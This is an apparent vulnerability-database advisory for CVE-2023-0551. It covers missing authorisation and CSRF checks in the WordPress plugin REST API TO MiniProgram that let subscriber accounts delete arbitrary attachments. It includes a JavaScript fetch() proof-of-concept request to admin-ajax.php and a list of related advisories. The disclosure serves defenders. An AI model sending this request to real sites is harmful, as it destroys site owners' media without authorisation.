REST API TO MiniProgram <= 4.6.9 – Subscriber+ Attachment Deletion | CVE 2023-0551 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks in an AJAX action, allowing ay authenticated users, such as subscriber to call and delete arbitrary attachments

Proof of Concept

fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=exopite-sof-file-batch-delete&media-ids%5B%5D=1&media-ids%5B%5D=1',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

rest-api-to-miniprogram

No known fix

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

de162a46-1fdb-47b9-9a61-f12a2c655a7d

Timeline

Publicly Published

2023-04-25 (about 2 years ago)

Added

2023-04-25 (about 2 years ago)

Last Updated

2024-03-22 (about 1 year ago)

Other

Published

Title

Published

2024-05-28

Title

WordPress Tour & Travel Booking Plugin for WooCommerce – WpTravelly < 1.7.2 - Missing Authorization via ttbm_new_place_save

Published

2020-11-06

Title

WooCommerce Blocks < 3.7.1 - Guest Account Creation

Published

2022-01-24

Title

WP Dependency Installer < 4.3.1 - Subscriber+ Arbitrary Plugin Activation

Published

2021-01-13

Title

Elementor Contact Form DB < 1.6 - Unauthenticated & Unauthorised Form Submissions Export

Published

2021-05-08

Title

ThemeHigh WooCommerce Wishlist and Comparison < 1.0.5 - Unauthorised AJAX call